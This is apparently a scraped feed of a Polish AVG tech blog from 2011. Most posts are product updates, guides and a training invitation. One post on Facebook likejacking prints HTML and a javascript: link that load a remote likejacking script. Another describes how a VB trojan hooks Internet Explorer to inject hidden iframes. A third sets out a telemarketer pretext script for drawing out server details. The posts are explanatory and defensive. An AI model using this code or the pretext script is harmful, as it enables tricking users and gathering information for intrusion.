Zmiany dotknęły wszystkich linii produktów – darmowych, dla domu oraz oczywiście dla firm włącznie z AVG Adminem.

AVG Free

- Zmodyfikowany został kreator instalacji – w związku z przebudową interfejsu oraz przegrupowaniem komponentów w czasie instalacji zaawansowanej do wyboru jest poprawiona lista składników

- Ulepszony został proces aktualizacji programu do nowej wersji. Uruchomienie instalacji AVG Free 2012 usunie poprzednią wersję AVG 2011 i zainstaluje nową bez ponownego uruchamiania systemu ( w przypadku aktualizacji z wersji 9.0 do 2012 restart będzie niezbędny)

- Zmiany w Instalatorze Online. W nowej wersji AVG korzystając z instalatora online baza sygnatur nie jest pobierana w czasie instalacji, a po zainstalowaniu programu w czasie pierwszej aktualizacji ma to na celu skrócenie czasu instalacji programu. Program zostaje zainstalowany z bazą podstawową o bardzo ograniczonej skuteczności i natychmiast po zakończeniu instalacji rozpoczyna pobieranie pełnej bazy sygnatur.

- Nowy interfejs użytkownika, w którym pojedyncze składniki zostały scalone w zestawy zgodnie z tym schematem:

- Wraz z uporządkowaniem składników w oknie głównym programu, uporządkowano również okno ustawień zaawansowanych.

- Składnik Menedżer Aktualizacji został ukryty.

- Odświeżony został gadżet pulpitu AVG dostępny w systemach Windows Vista oraz 7, zmieniony został jego styl graficzny.

- W menu Pomoc -> Informacje o AVG dodano zakładkę Pomoc Techniczna ze szczegółowymi informacjami o wersji programu, bazy wirusów, licencji oraz linkami do FAQ, forum i działu pobierania.

- Nowa funkcjonalność – Moje Aplikacje widoczna w oknie głównym programu. Zawiera informacje o zainstalowanych programach dodatkowych od AVG oraz przyciski ułatwiające ich zakup online.

- W skład komponentu Anti-Virus włączono składniki AntiSpyware, Ochronę rezydentną oraz Cache server. Dodatkowo zmienił się wygląd postępu skanowania.

- Składnik Link Scanner został połączony z Ochroną Sieci. Funkcjonalność ochrony sieci w wersji Free jest wyłączona i oznaczona informacją, że do jej aktywacji wymagana jest wersja komercyjna.

- Ochrona poczty E-mail zawiera skaner poczty oraz antyspam podobnie jak Ochrona Sieci w przypadku LinkScannera wymagający zakupu licencji na wersję komercyjną.

- Moduł AntyRootkit został wzbogacony o obsługę wyjątków od skanowania. Niektóre z bezpiecznych programów np. sterownik DaemonTools są wykrywane jako rootkity – teraz użytkownik ma możliwość utworzyć wyjątek dla takiego pliku.

- Odświeżona wersja AVG Toolbara

- AVG Advice – nowa cecha programu AVG, która monitoruje użycie zasobów przez przeglądarki IE, Firefox, Chrome, Opera i Safari. Jeśli przeglądarka zacznie zużywać zauważalnie więcej zasobów niż zwykle wyświetlane jest powiadomienie dla użytkownika z propozycją uruchomienia przeglądarki ponownie.

- Znaczne optymalizacje wydajności, głównie w kierunku redukcji użycia pamięci RAM. Zmniejszono ilość procesów AVG, WatchDog nie uruchamia kolejnych procesów, a ładuje biblioteki dynamiczne DLL. Procesy Ochrony rezydentnej oraz serwera cache scalono w jeden proces, jeden z procesów Identity Protection został zastąpiony biblioteką dynamiczną.

AVG Anti-Virus i Internet Security 2011

- Wszystkie zmiany dotyczące wersji Free dotyczą również wersji komercyjnych.

- W trybie instalacji zaawansowanej użytkownik ma możliwość wykluczenia z instalacji składnika PC Analyzer

- Ulepszony składnik ochrona sieci dostępny jako jeden z elementów LinkScannera wspiera obok dotychczasowo obsługiwanych komunikatorów ICQ, MSN i Yahoo również Skype. Ochrona ta dotyczy przesyłanych przez komunikator plików.

- Ochrona pobierania i P2P w Ochronie Sieci wspiera natywnie aplikacje: uTorrent, Ares, Internet Download Manager, Steam, BitTorrent.

- W wersji Internet Security Ochrona Sieci posiada dodatkowo komponent AVG Accelerator, który wykorzystując sterownik TDI optymalizuje pobieranie plików oraz strumieniowanie video np. z YouTube używając kilku równoległych połączeń. Przyspieszane zasoby pobierane bądź buforowane są automatycznie skanowane.

AVG Business Edition

- Zmiany wymienione wyżej dla wersji Free oraz komercyjnej mają zastosowanie również w AVG Anti-Virus i Internet Security Business Edition.

- AVG Zdalna Administracja wspiera stacje robocze z AVG 2011 oraz 2012. Brak wsparcia dla AVG 9.0 i 8.5 w AVG Admin 2012.

- Aktualizacja AVG Admin 2011 do 2012 wymaga uruchomienia instalatora nowej wersji. Podczas instalacji baza danych DataCenter zostaje automatycznie skonwertowana do nowej wersji.

- Kreator instalacji sieciowej potrafi teraz wykonywać zdalną aktualizację oprogramowania na stacjach roboczych wraz z reinstalacją zdalną do nowej wersji 2012.

- W konsoli administracyjnej uproszczono interfejs, dodano nowy pulpit z podsumowaniem pracy systemu, uporządkowano menu podręczne oraz dodano opcję zdalnego wyłączania stacji roboczych.

- Nowa funkcjonalność Admin Update Assistant – pozwala bezproblemowo wykonywać aktualizację AVG Admina do nowszej wersji bez konieczności ręcznego reinstalowania AVG Admina.

- Całkowicie nowa metoda wykonywania zdalnej instalacji sieciowej AVG na stacjach roboczych. Nie jak dotychczas z użyciem AVG Agenta oraz usługi udostępniania plików, a z wykorzystaniem WMI (Windows Management Instrumentation). Do instalacji wymagane są teraz: odpowiedź stacji na ping, aktywne RPC (Zdalne wywołanie procedur), otwarty port 135 TCP oraz konto administratora.

Na koniec zostawiam zrzut ekranu z nowym interfejsem AVG 2012.

Pierwsza z metod to tzw. ClipJacking – zwrócenie uwagi użytkownika rzekomo interesującym klipem wideo. z popularnych to np. jakaś panienka na miniaturce, słodki tygrysek czy kadr z filmu z fragmentem jakiegoś obiektu czy przedmiotu i banalne pytanie What is this? – Co to jest? Chętni do pomocy klikną i otwiera się nowa zakładka – sam fakt kliknięcia w ten link na czyjejś tablicy i otwarcie docelowej strony powoduje skopiowanie automatycznie wpisu do nas i ustawienie znacznika Lubię To dla tej strony choć wcale tego nie chcieliśmy – to właśnie jest ClipJacking.

ClipJacking to jedna z kilku metod na nabijanie licznika Lubię to, wszystkie te sztuczki to właśnie LikeJacking.

Jak to działa.

Po pierwsze trzeba zwrócić uwagę użytkownika, zachęcić go do kliknięcia. Na facetów działają na pewno takie miniaturki przy wpisach, że któryś z naszych znajomych lubi ten klip

Skoro zwróciliśmy uwagę użytkownika i kliknął to został przekierowany na nową zakładkę i zamierza owy film obejrzeć. W kodzie docelowej witryny mamy:

ukryty iframe:

który ładuje fblike.html

Skrypt umieszczony w kodzie fblike.html powoduje automatyczne wykonanie operacji takiej samej jak procedura kliknięcia w lubię to. Wykonuje się to automatycznie bo użytkownik jest zalogowany do Facebooka – z facebooka na link trafiliśmy.

Klip na stronie z oszustwem ma 99% szans na to, że nie działa ale sam fakt wejścia na tą stronę powoduje dodanie na naszej tablicy informacji, że użytkownik xxx lubi: i tu będzie ta sama miniaturka, która skusiła nas na tablicy znajomego.

Jak się przed tym bronić? Jeśli masz ochotę mimo wszystko sprawdzać podejrzane linki na tablicy znajomego to najbezpieczniejszą metodą jest robienie tego w innej przeglądarce. Używasz np. Firefox i widzisz na tablicy znajomego teoretycznie interesujący link – kliknij prawym klawiszem, skopiuj adres odnośnika i wklej go w pasku adresu innej przeglądarki – Opera, Chrome, Internet Explorer. Jeśli okaże się fałszywym to nic się nie stanie klik w LubięTo nie zadziała bo w zapasowej przeglądarce nie jesteś zalogowany do Facebooka.

Druga metoda to podpięcie przycisku Lubię to pod kursor myszy. Działa to skuteczniej na rzetelnych stronach i sprawia, że kliknięcie w dowolny URL na stronie powoduje pojawienie się tuż pod kursorem przycisku Lubię To. Z reguły czas reakcji i spostrzegawczość użytkowników są niewystarczające i jak zauważymy znaczek podniesionego kciuka to już jest po kliknięciu.

Jak działa taki trick? W kodzie witryny wstawiony będzie skrypt podobny do tego poniżej:

<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
        <title>No Cookiecheck, activation at click</title>
        <script src="http://code.*.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.********* = 1</script>

<script src="http://likejacking.*********.eu/likejacking.php"></script>

    </head>
    <body>
<a href="javascript:(function(){var s = document.createE*('script');s.src =
'http://likejacking.*.eu/likejacking.php?url=facebook.com&time=10&test';document.getElementsByTagName
('body')[0].appendChild(s);})();">View Demo</a>

    </body>
</html>

Efekt wygląda następująco:

Wskazanie kursorem linka View Demo powoduje pojawienie się pod kursorem przycisku like, który wykona klik w Lubię To równocześnie z kliknięciem w URL.

Druga metoda zaimplementowania tego tricku to zmiana headera naszej strony i dodanie:

<script src="http://code.**.com/jquery-1.5.js"></script>
 <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
 <script>window.********** = 1</script>
 <script src="clickjacking.js"></script>

W wywoływanym skrypcie clickjacking.js na serwerze jest umieszczony kod taki jak podany tutaj.

Trzeba pamiętać, że ta metoda nie jest inicjowana na facebooku – zalogowany użytkownik klika w link na tablicy znajomego, a działa na dowolnej www, a więc jeśli użytkownik nie jest aktualnie zalogowany do Facebooka np. w innej zakładce to pojawi się iframe z prośbą o zalogowania się.

Różnica między pierwszą, a drugą metodą to użycie w pierwszej metodzie skryptu linkowanego z zewnętrznego serwera, a w drugiej lokalnie przechowywanego.

Pamiętajcie też proszę, że wszystkie skrypty tu podane są jako przykłady i nie powinny być używane na waszych stronach www nawet jeśli uda się Wam poprawić błędy, które celowo w nich zrobiłem.

Zacznijmy od tego, że program jest dostępny w Android Market.

Wystarczy w Markecie wyszukać AVG Antivirus lub skorzystać z pomocnego linku poniżej:

Antivirus Free Antivirus Pro.

Cechy wspólne wersji Free i płatnej Pro.

Bezpieczeństwo:

• Skanowanie całego urządzenia pamięci ROM i karty SD
• Skanowanie według definiowanego przez użytkownika harmonogramu co tydzień, codziennie lub na żądanie
• Skanowanie aplikacji
• Skanowanie ustawień systemowych
• Skanowanie zawartości – kontakty, wiadomości SMS/MMS, zakładki, pliki
• Skanowanie mediów – zdjęcia, muzyka, filmy wideo

Ochrona przed kradzieżą:

• Możliwość odnalezienia skradzionego telefonu przez GPS
• Zdalne wyświetlanie wiadomości na skradzionym telefonie
• Zdalna blokada urządzenia i usunięcie wszystkich danych
• Zdalne zarządzanie aplikacjami

Ochrona SMS:

• Antyspam dla wiadomości SMS

Pro vs. Free

• Główne różnice między wersją PRO a darmową to:
• Ochrona SMS Premium – analiza wiadomości SMS w czasie rzeczywistym, blokowanie spamu SMS`owego przed pobraniem na telefon
• Wsparcie techniczne – użytkownicy wersji komercyjnej są objęci pomocą techniczną
• Wersja PRO jest pozbawiona reklam
• W wersji Free Backup Aplikacji i Blokady Aplikacji działają tylko jako wersje testowe przez 14 dni

Wersje Androida

• Android 1.5
• Android 1.6
• Android 2.0/2.1
• Android 2.2
• Android 2.3
• Android 3.0/3.1

Android 1.5 choć jest wspierany i program na nim działa to zalecane jest używanie programu AVG Antivirus na Android 1.6 lub nowszym.

Zależność funkcjonalności od wersji Android

• Backup aplikacji działa z Android 1.6 lub nowszym
• Wyszukiwanie telefonu przez GPS  – Android 2.1 lub nowszy
• Kopia zapasowa danych – Android 2.1 lub nowszy
• Usługa lokalizacji telefonu – Android 2.1 lub nowszy
• Zdalne czyszczenie skradzionego telefonu – Android 2.2 lub nowszy
• Zdalna blokada urządzenia – Android 2.2 lub nowszy

Od lewej AVG Free i PRO

]]> http://techblog.avg.pl/index.php/2011/07/avg-antivirus-dla-android/feed/ 0 http://techblog.avg.pl/index.php/2011/07/avg-antivirus-dla-android/ http://feeds.avg.pl/~r/techblog-avg-pl/~3/0z7B-vMxat8/ http://techblog.avg.pl/index.php/2011/06/avg-linkscanner-dla-firefox5/#comments Fri, 24 Jun 2011 09:21:35 +0000 Arek Zakrzewski http://techblog.avg.pl/?p=579 Udostępniona została dziś poprawka AVG dla wszystkich wersji zarówno darmowych jak i komercyjnych. Hotfix 1388 dodaje aktualizację modułu SafeSearch dla Firefox 5.

AVG powinno się automatycznie uaktualnić do wersji 10.0.1388 – sprawdźcie w oknie głównym, w lewym, dolnym rogu aktualną wersję. Jeśli nie ma jeszcze 1388 to klikamy w aktualizuj teraz. Aktualizacja jest również dostępna jako pakiet instalacyjny. Wszystkie aktualne instalatory są już dostępne w naszym pobierz: http://www.avg.pl/pobierz.html

Po uaktualnieniu AVG do 1388 pozostaje włączyć dodatek AVG – w Firefox wybieramy Dodatki, włączamy SafeSearch i potwierdzamy ponowne uruchomienie przeglądarki.

Bootowanie z RescueCD

Do wyboru mamy następującą listę po starcie komputera z płytki lub nośnika USB:

• AVG Rescue CD – start w domyślnej konfiguracji
• AVG Rescue CD with Disabled Framebuffer – w przypadku problemów z wyświetlaniem tryb bez bufora ramki powinien działać poprawnie
• AVG Rescue CD with Resolution Selection – opcja bootowania z framebufferem ale z wyborem rozdzielczości przydatna w przypadku nietypowych systemów lub problemów z wyświetlaniem
• Boot from floppy – uruchomienie systemu/boot recordu zapisanego na dyskietce
• Boot from hard disk – uruchomienie systemu lub boot sektora z dysku twardego ustawionego jako pierwszy w BIOS
• Boot from next device in the BIOS boot sequence – jeśli CD lub USB był pierwszym urządzeniem bootowalnym to ta opcja pominie nośnik i uruchomi kolejne urządzenie w kolejności według ustawień BIOS
• Memtest86+ – uruchamia narzędzie do testowania pamięci RAM, które wykryje ewentualne problemy z pamięcią jak błędy odczytu/zapisu.
• Exit to the syslinux boot prompt – wyjście do wiersza poleceń bootowania syslinux.

Po 1-2 minutach od wybrania trybu Rescue CD zostaniemy poproszeni o zaakceptowanie licencji na oprogramowanie.

Enterem wybieramy I agree i pojawi się monit o testowaniu połączenia internetowego.

Na tym etapie sprawdzana jest poprawność konfiguracji połączeń sieciowych inicjowana automatycznie przez dhclienta w czasie bootowania. Jeśli konfiguracja się nie powiodła pojawi się opcja ręcznego przypisania adresu IP, maski podsieci i bramy, która będzie wykorzystywana.

Menu główne.

Najważniejsza opcja to oczywiście Scan. Opcja skanowania dysków lub wybranych folderów na wykrytych dyskach twardych.

Po wybraniu opcji skanowania pojawi się zalecenie wykonania aktualizacji baz wirusów przed rozpoczęciem skanowania.

Jeśli na aktualizację się zgodziliśmy to trzeba wybrać sposób jej wykonania

• Online – pobiera automatycznie aktualizację z serwerów AVG i instaluje ją do użycia w RescueCD.
• Offline – pozwala na aktualizację z dysku twardego komputera lub z nośnika USB, na których mamy wcześniej pobrane pliki aktualizacji.
• Download – pobranie plików aktualizacji bez ich instalowania w bieżącej sesji.

Po wybraniu Online pojawi się dodatkowa opcja wyboru, którego poziomu aktualizacje mają zostać pobrane

• priority 2 – Aktualizacja baz sygnatur (zalecany)
• priority 3 – aktualizacja komponentów programu
• priority 4 – aktualizacje opcjonalne – przydatne tylko w przypadku pobierania aktualizacji w trybie Download

Syslinux wykona polecenie avgupdate -b –priority # o wybranym przez nas poziomie aktualizacji. Pojawi się podgląd postępu pobierania i po zakończeniu informacja o zakończeniu aktualizacji. Wciskamy dowolny klawisz i wracamy do okna głównego.

Pojawi się jeszcze potwierdzenie, że aktualizację zakończono pomyślnie.

Po zakończeniu aktualizacji automatycznie rozpocznie się skanowanie wybrane przez nas wcześniej, a jeśli aktualizacja była tylko uruchamiana z menu to wrócimy do głównego okna programu.

W najbliższych dniach część 3 – analiza wyników skanowania, leczenie/usuwanie wykrytych zagrożeń, zarządzanie kwarantanną systemu lokalnego.

Część 4 – narzędzia dodatkowe w RescueCD – Midnight Commander, TestDisk, File Recovery, edytor rejestru Windows.

Część 5 – RescueCD do naprawy unieruchomionego Windows na przykładach.

Pierwsza definicja to ta najłatwiej przyswajalna:

SOCIAL ENGINEERING – The clever manipulation of the natural human tendency to trust.

INŻYNIERA SOCIALNA – sprytne manipulowanie naturalną tendencją człowieka do zaufania.

Wikipedia również bardzo ładnie definiuje:

Inżynieria społeczna, inżynieria socjalna, socjotechnika — w bezpieczeństwie teleinformatycznym zestaw metod mających na celu uzyskanie niejawnych informacji przez cyberprzestępcę. Crackerzy często wykorzystują niewiedzę bądź łatwowierność użytkowników systemów informatycznych, aby pokonać zabezpieczenia odporne na wszelkie formy ataku. Wyszukują przy tym najsłabszy punkt systemu bezpieczeństwa, którym najczęściej jest człowiek.

Odwiedźcie podlinkowany artykuł na wiki i doczytajcie więcej.

Ideą socjotechnik jest zdobycie maksimum interesujących nas informacji np. danych o konfiguracji sieci, używanych systemach, ich wersjach i wszystkim co może pomóc w potencjalnym włamaniu. Specjaliści od Social engineeringu to ludzie, którzy potrafią perfekcyjnie manipulować rozmówcą, dobierać argumenty i sformułowania, które naszego rozmówcę zdekoncentrują. Pytając o sprawy z pozoru błahe i nieistotne, chwaląc rozmówcę za np. udzieloną wcześniej pomoc czy w dowolny inny sposób zdobywając jak największe zaufanie osoby po drugiej stronie, mając zaufanie lub zdobytą uwagę – czymś zainteresowaliśmy naszego słuchacza i daje się wciągnąć w dyskusję – dochodzimy do etapu pytań właściwych, z których informacje są dla nas przydatne.

Jedną z najpopularniejszych metod socjotechnicznych jest metoda na telemarketera.

Dzwonimy do naszej potencjalnej ofiary, przedstawiamy się jako pan X.Y z firmy zzz, która produkuje jakieś tam super świetne rozwiązanie zabezpieczające np. antywirusa na serwery Linux. Mamy spore szanse zaintrygować naszego potencjalnego rozmówcę pod warunkiem, że uda nam się błyskawicznie zatrzymać go przy słuchawce dobrym argumentem. Tu najczęściej padają stwierdzenia:

- oprogramowanie jest bardzo atrakcyjne cenowo proszę tylko posłuchać co oferujemy

- produkt ma wysoką skuteczność potwierdzoną w testach i do tego świetną cenę

- lub analogiczne sformułowania, które przyciągają rozmówcę najłatwiejszym wabikiem – pieniądz. Dajemy rozmówcy pozór, że oszczędzi wybierając nasze rozwiązanie.

Jeśli udało nam się zwabić rozmówcę i chce nas wysłuchać to pora na manipulację. Zaczynamy od opowiedzenia szybko i zwięźle żeby człowieka nie zanudzić, ze program potrafi między innymi: tu podajemy kilka bardzo dobrych argumentów, które spotęgują ciekawość rozmówcy, że faktycznie to może być coś ciekawego. Jeśli dalej mamy szczęście to rozmówca nas słucha, a więc używamy naszego wabika – pieniędzy i tym samym ruszamy do ataku.

- Wie Pan program jest modularny i można dowolnie dobrać składniki aby uzyskać jak najlepszą funkcjonalność w najlepszej cenie. Mogę wycenę dla Pana przygotować tylko proszę podać mi: na jakim systemie będziemy produkt instalować, co będziemy zabezpieczać – serwer plików, poczty, bazodanowy, www – na przykład serwer bazodanowy.

Proszę zatem podać mi jakiego typu baz danych Pan używa żebym mógł potwierdzić, że takie rozwiązanie wspieramy – pada np. MySQL i Firebird,- proszę jeszcze podać mi wersje silników – MySQL 5, Firebird 2.1.2.

Klient zainteresowany zakupami podał nam na tacy system z jakiego korzysta serwer, co ten serwer robi i jakiej wersji oprogramowania używa. Skoro wyciągnęliśmy z rozmówcy co chcieliśmy to pora na odwet. Metody wyjścia z telemarketera mamy dwie:

- dokańczamy rozmowę:

podajemy cenę, która jest niestrawna dla nikogo i klient odpowie, że nie jest zainteresowany,

podajemy cenę, która jest atrakcyjna, bierzemy adres e-mail dla utrzymania wiarygodności całego procesu i obiecujemy przesłać ofertę mailem

- wycofujemy się natychmiast

przykro mi używanego przez Pana środowiska (cokolwiek by to nie było) nie wspieramy. Nasz produkt obsługuje tylko…. wymieniamy alternatywne rozwiązania. Dziękujemy ładnie za poświęcony czas i żegnamy się.

Którejkolwiek drogi byśmy nie wybrali zdobyliśmy to co nas interesowało.

Kolejna opcja socjotechniki zakłada zmuszenie naszego rozmówcy do interakcji z plikiem, linkiem do strony www. Popularny scenariusz to „na niezadowolonego klienta„. Dostałem od was fakturę/dokument/plik którego nie mogę otworzyć. Odsyłam go w załączniku i proszę sprawdzić.

Choć wydaje się to dość trywialne i szyte grubymi nićmi to socjotechniki naprawdę działają. Problemem jest ludzka ciekawość, naiwność i pogoń za pieniądzem. Tam, gdzie pojawi się widmo oszczędzenia kilku groszy jest spora szansa zdobycia zainteresowania – nie powiedzie się tylko jeśli trafimy na osobę kompetentną, która np. jest przywiązana do obecnie używanego systemu czy innego „towaru”, który oferujemy.

Jeśli kogoś temat zainteresował to serdecznie polecam lekturę Kevina Mitnicka „Sztuka podstępu. Łamałem ludzi nie hasła.” Mitnick to jeden z najbardziej doświadczonych socjotechników światka informatycznego. W swojej książce opisuje wiele ciekawych przykładów jak łatwo jest manipulować ludźmi dobierając odpowiednie argumenty i stosując odpowiedni wabik.

Na koniec zaś. Social Engineering to nie tylko branża IT. Socjotechnika jest wszędzie, nawet w naszym codziennym życiu. Tu macie przykład z tureckiej policji:

http://niebezpiecznik.pl/post/turecka-policja-przebrana-za-lekarzy-ciekawy-eksperyment/

Domyślny widok google.com:

i tuż po użyciu malware:

Wygląda zupełnie jak ramka wstawiona w kod witryny google.com. Analizując źródło strony nie ma w kodzie nic niezwykłego więc to na pewno nie frame injection. Wiemy też na pewno, że Google nie zostały zhakowane i nie ma ARP spoofa w naszej testowej sieci.

Skąd więc owa ramka się wzięła? Po dogłębnej analizie wykryto, że wykorzystywany jest obiekt  ‘InternetExplorer’.  Czym jest zatem obiekt InternetExplorer? Jest to funkcja wstawienia instancji Internet Explorera w kod dowolnej aplikacji napisanej w Visual Basic.

Jak wspomniałem malware powstało w VB, tu macie przykład jak taki obiekt w VB wstawić:

Dim IE As SHDocVw.InternetExplorer

Set IE = CreateObject(„InternetExplorer.Application”)

Malware sprawdza wszystkie uruchomione procesy iexplore.exe i odczytuje wartość opcji ‘FullName’. Jeśli jest ‘IExplorer.exe’ malware próbuje wstawić się przed wywołanie funkcji ‘BeforeNavigate’, ’OnVisible’ lub podobnych więc jeśli IE wykona przejętą funkcję to uruchomiony zostanie kod malware.

Modyfikacja przejmowanej funkcji dotyczy sprawdzenia URL docelowego i wstawienia fałszywego. Po pierwsze sprawdzane jest czy URL jest adresem fałszywym czyli kod został już wykonany czy nowy proces ma jeszcze zamiast URL ustawiony ‘About:Blank’. Po drugie sprawdzany jest status funkcji ‘ReadyState’ żeby zweryfikować czy strona została już w całości załadowana. Po trzecie następuje przejęcie obiektu DOM  (Document Object Model) i wstawienie kodu iframe . Z racji tego, że kod iframe jest wstawiany przez obiekt DOM, to nie widać kodu iframe w źródle witryny. W testowanym przypadku docelowy URL, do którego prowadził wstawiony jako DOM kod jest już zablokowany i niedostępny dlatego wstawiony na screenie wyżej iframe zwrócił ‘Page not found’.

Sprawdzenie URL:

Sprawdzenie stanu ReadyState:

Kod wstawianego obiektu DOM:

Póki co detekcja tego typu infekcji przez antywirusy jest niska. AVG wykrywa tego typu infekcję jako Trojan VB.AMTX

Udostępniona została aktualizacja AVG 9.0.901, która eliminuje problem składnika AVG WatchDog avgwdsvc.exe. Aktualizacja tak jak wersja 9.0.900 jest dostępna w ramach aktualizacji automatycznej i powinna się zainstalować zgodnie z harmonogramem aktualizacji. Jeśli jednak nadal korzystacie z wersji 900 to proszę w oknie głównym AVG kliknąć przycisk Aktualizuj teraz i potwierdzić aktualizację komponentów programu.

Jeśli ktoś miałby nadal problem na wersji AVG 9.0.901 to proszę AVG 9 odinstalować i jak radziłem wcześniej skorzystać z możliwości migracji do wersji 2011. W sytuacjach gdy wersja 9.0 musi być używana nadal np. na Windows 2000 AVG odinstalowujemy, instalujemy ponownie z pakietu instalacyjnego 894 dostępnego na: http://www.avg.com/pl-pl/download-9 i wykonujemy aktualizację programu. Wadliwa wersja 900 zostanie pominięta i program od razu uaktualni się do poprawnej wersji 9.0.901.

W razie problemów z avgwdsvc w wersji 9.0.901 zgłoście proszę problem na pomoc@avg.pl.

Białystok, Kraków, Lublin, Olsztyn, Rzeszów (16 – 20 maja 2011)

Chciałbym zaprosić na wyjątkowe, bezpłatne szkolenia, które organizujemy wraz z firmą Axence – producentem programu do monitorowania i zarządzania komputerami w firmach i instytucjach.

Zagadnienia omawiane podczas szkoleń:

• ataki na komputery w sieci firmowej z wykorzystaniem technik Social Engineering;
• przykład infekcji komputera poprzez pozornie nieszkodliwy plik PDF;
• jak się bronić – bezpieczeństwo sieciowe i zabezpieczenia antywirusowe;
• mapowanie i proaktywne monitorowanie sieci; optymalna konfiguracja alarmów, akcji korekcyjnych i raportów;
• monitoring parametrów środowiskowych serwerowni (pokaz praktyczny na przykładowych czujnikach);
• inwentaryzacja sprzętu i oprogramowania (audyty legalności); efektywne zarządzanie licencjami;
• ewidencjonowanie majątku IT za pomocą modułu administracyjno-rozliczeniowego (tzw. Środki Trwałe);
• inteligentne monitorowanie pracowników; monitorowanie odwiedzanych stron WWW i ich blokowanie;
• monitorowanie wiadomości e-mailowych; monitorowanie i raporty kosztów wydruków;
• zdalna pomoc techniczna dla użytkowników (remote access) z bazą zgłoszeń i czatem;
• ochrona danych przed wyciekiem (zarządzanie urządzeniami przenośnymi oraz portami);
• ochrona przed szkodliwym oprogramowaniem przenoszonym na nośnikach danych (blokowanie portów i nośników);

Terminy i miejsca szkoleń:

1. 16.05.2011: Olsztyn, Hotel Warmiński, ul. Kołobrzeska 1, Sala Dębowa
2. 17.05.2011: Białystok, Best Western Hotel Cristal, Lipowa 3/5, Sala nr 1
3. 18.05.2011: Lublin, Hotel-Restauracja „Lwów”, ul. Bronowicka 2, Sala Kolumnowa
4. 19.05.2011: Rzeszów, Icam House Hotel, Al. T. Rejtana 1, Sala Grecka
5. 20.05.2011: Kraków, Hotel Atrium, ul. Krzywa 7, Sala Konferencyjna

>> Zarejestruj się za darmo już teraz

Kontakt w sprawie rejestracji: Dawid Spałek, biuro@avg.pl

Upominki dla uczestników:

Każdy uczestnik otrzyma:

• 3-miesięczną wersję AVG Internet Security Business Edition 2011 (na 10 stanowisk);
• bezterminową i w pełni funkcjonalną licencję Axence NetTools 4.0 (rozbudowany zestaw narzędzi do skanowania, monitorowania i administrowania sieciami, z bardzo intuicyjnym interfejsem użytkownika);
• imienny certyfikat;

oraz weźmie udział w losowaniu:

• komercyjnych licencji AVG Internet Security 2011 (na 1 stanowisko, na 1 rok);
• upominków ufundowanych przez Axence;

AGENDA szkoleń

1. 08:30 Rejestracja i przywitanie uczestników przy porannej kawie.
2. 09:00 Współczesne zagrożenia w sieci. IT Security to nie wszystko – jest jeszcze Social Engineering. Symulacja ataku na komputer w sieci firmowej z wykorzystaniem technik Social Engineering – jak się obronić? Wykład prowadzi ekspert firmy CORE – Dystrybutora AVG w Polsce.
3. 09:45 Wprowadzenie do Axence nVision 5.5. Omówienie przeznaczenia i funkcjonalności, korzyści informatycznych i biznesowych oraz licencjonowania programu i nowości w wersji 5.5. Prezentację prowadzi ekspert Axence.
4. 10:45 Przerwa kawowa.
5. 11:15 Pokaz praktyczny Axence nVision 5 połączony z indywidualnymi konsultacjami. (I) Instalacja, wdrożenie i optymalna konfiguracja programu oraz jego praktyczne wykorzystanie do rozwiązywania najczęściej spotykanych problemów sieciowych. Wprowadzenie do inwentaryzacji oprogramowania i audytów legalności ze szczególnym naciskiem na politykę licencjonowania Microsoft.
6. 12:15 Przerwa.
7. 12:30 Pokaz praktyczny Axence nVision 5 połączony z indywidualnymi konsultacjami. (II) Instalacja, wdrożenie i optymalna konfiguracja programu oraz jego praktyczne wykorzystanie do rozwiązywania najczęściej spotykanych problemów sieciowych.
8. 13:30 Przerwa kawowo-kanapkowa.
9. 14:00 Implementacja AVG Internet Security Business Edition 2011. Pokaz praktyczny szybkiej konfiguracji w środowisku sieciowym.
10. 15:15 Losowanie upominków i wręczenie certyfikatów. Zakończenie.

Jeszcze raz zapraszam!

Problem dotyczy modułu AVG dla przeglądarki Firefox.
Niestety problem dotyczy prawie wszystkich użytkowników AVG9, analiza szczegółów na podstawie zebranych danych trwa i nie jestem w stanie określić kiedy udostępniona zostanie aktualizacja dla AVG9, która ten problem eliminuje.

Aby problemu pozbyć się już teraz zalecane jest odinstalowanie wersji AVG 9, w razie problemów z usuwaniem używamy AVG Remover:

Dla AVG 9.0:

Dla systemów 32bit:
http://pliki.avg.pl/filedir/util/avg_arm_sup_____.dir/avgremover.exe

Dla systemów 64bit:
http://pliki.avg.pl/filedir/util/avg_arv_sup_____.dir/avgremoverx64.exe

i zainstalowanie ze swoim numerem licencji wersji AVG 2011 dostępnej do pobrania na www.avg.pl/pobierz
Wszyscy posiadacze licencji na produkty AVG mają pełne prawo ze swoim numerem licencji instalować nowszą wersję jaka jest dostępna.

Użytkownicy wersji Free po prostu ją odinstalowują i instalują nową wersję darmową – AVG Free 2011. Numer licencji dla instalacji wersji Free jest zawarty w pakiecie instalacyjnym.

To na obecną chwilę najpewniejsze rozwiązanie, które wyklucza problem.

Komunikat o błędzie jest generowany przez system Windows: